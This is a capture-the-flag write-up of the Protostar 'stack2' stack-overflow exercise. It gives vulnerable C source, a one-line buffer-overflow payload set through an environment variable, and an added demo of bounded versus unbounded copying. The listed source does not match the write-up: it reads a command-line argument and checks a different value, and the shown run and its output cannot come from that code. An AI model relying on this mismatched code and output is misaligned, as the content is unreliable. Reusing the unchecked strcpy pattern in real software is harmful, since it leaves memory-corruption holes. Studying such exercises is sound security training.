Protostar vm, stack2

Here is the source of the vulnerable program:

```c
#include <err.h>      /* errx() */
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
    volatile int modified;
    char buffer[64];

    if(argc == 1) {
        errx(1, "please specify an argument\n");
    }

    modified = 0;
    /* Unbounded copy: strcpy() has no length check, so input longer
       than 63 bytes writes past the end of buffer. */
    strcpy(buffer, argv[1]);

    if(modified == 0x61626364) {
        printf("you have correctly got the variable to the right value\n");
    } else {
        printf("Try again, you got 0x%08x\n", modified);
    }
}
```

The goal here is to overflow the buffer through an environment variable. This time the value of modified has to be 0x0d0a0d0a.

Since 0x0a and 0x0d are the ASCII line feed and carriage return, which are not printable characters, we’ll use the ‘\x’ escape notation. x86 is little-endian, so the bytes are written in reverse order: 0a 0d 0a 0d.

Here’s the solution:

```
user@protostar:/opt/protostar/bin$ export GREENIE=`python -c 'print 64*"A"+"\x0a\x0d\x0a\x0d"'`
user@protostar:/opt/protostar/bin$ ./stack2
you have correctly modified the variable
```
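To see why those four bytes end up as 0x0d0a0d0a, and what a length check changes, here is an added example (not part of the original writeup or the Protostar source). It models the frame as a struct with `modified` directly after `buffer` and assumes a little-endian host; `struct frame`, `make_payload`, `unbounded_copy` and `bounded_copy` are hypothetical names.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed layout: `modified` sits directly after `buffer`, as the
 * writeup's 64-byte offset implies. A struct keeps the demo well-defined. */
struct frame {
    char     buffer[64];
    uint32_t modified;
};

/* Constructed sample input: the GREENIE value, 64 filler bytes + 4. */
void make_payload(char out[69])
{
    memset(out, 'A', 64);
    memcpy(out + 64, "\x0a\x0d\x0a\x0d", 5);   /* 4 bytes + NUL */
}

/* Models the unchecked strcpy(): every input byte is copied, so bytes
 * 64..67 land in `modified`. The cap only keeps the model in bounds. */
uint32_t unbounded_copy(const char *src)
{
    struct frame f;
    size_t n = strlen(src);
    memset(&f, 0, sizeof f);
    if (n > sizeof f) n = sizeof f;
    memcpy(&f, src, n);
    return f.modified;
}

/* Hardened form: refuse input that does not fit, terminator included. */
int bounded_copy(const char *src, uint32_t *modified_out)
{
    struct frame f;
    size_t n = strlen(src);
    int rc = 0;
    memset(&f, 0, sizeof f);
    if (n >= sizeof f.buffer) rc = -1;        /* too long: nothing copied */
    else memcpy(f.buffer, src, n + 1);
    *modified_out = f.modified;
    return rc;
}

int main(void)
{
    char p[69];
    uint32_t m;
    make_payload(p);
    printf("unbounded: modified = 0x%08x\n", (unsigned)unbounded_copy(p));
    printf("bounded:   rc = %d\n", bounded_copy(p, &m));
    printf("bounded:   modified = 0x%08x\n", (unsigned)m);
    return 0;
}
```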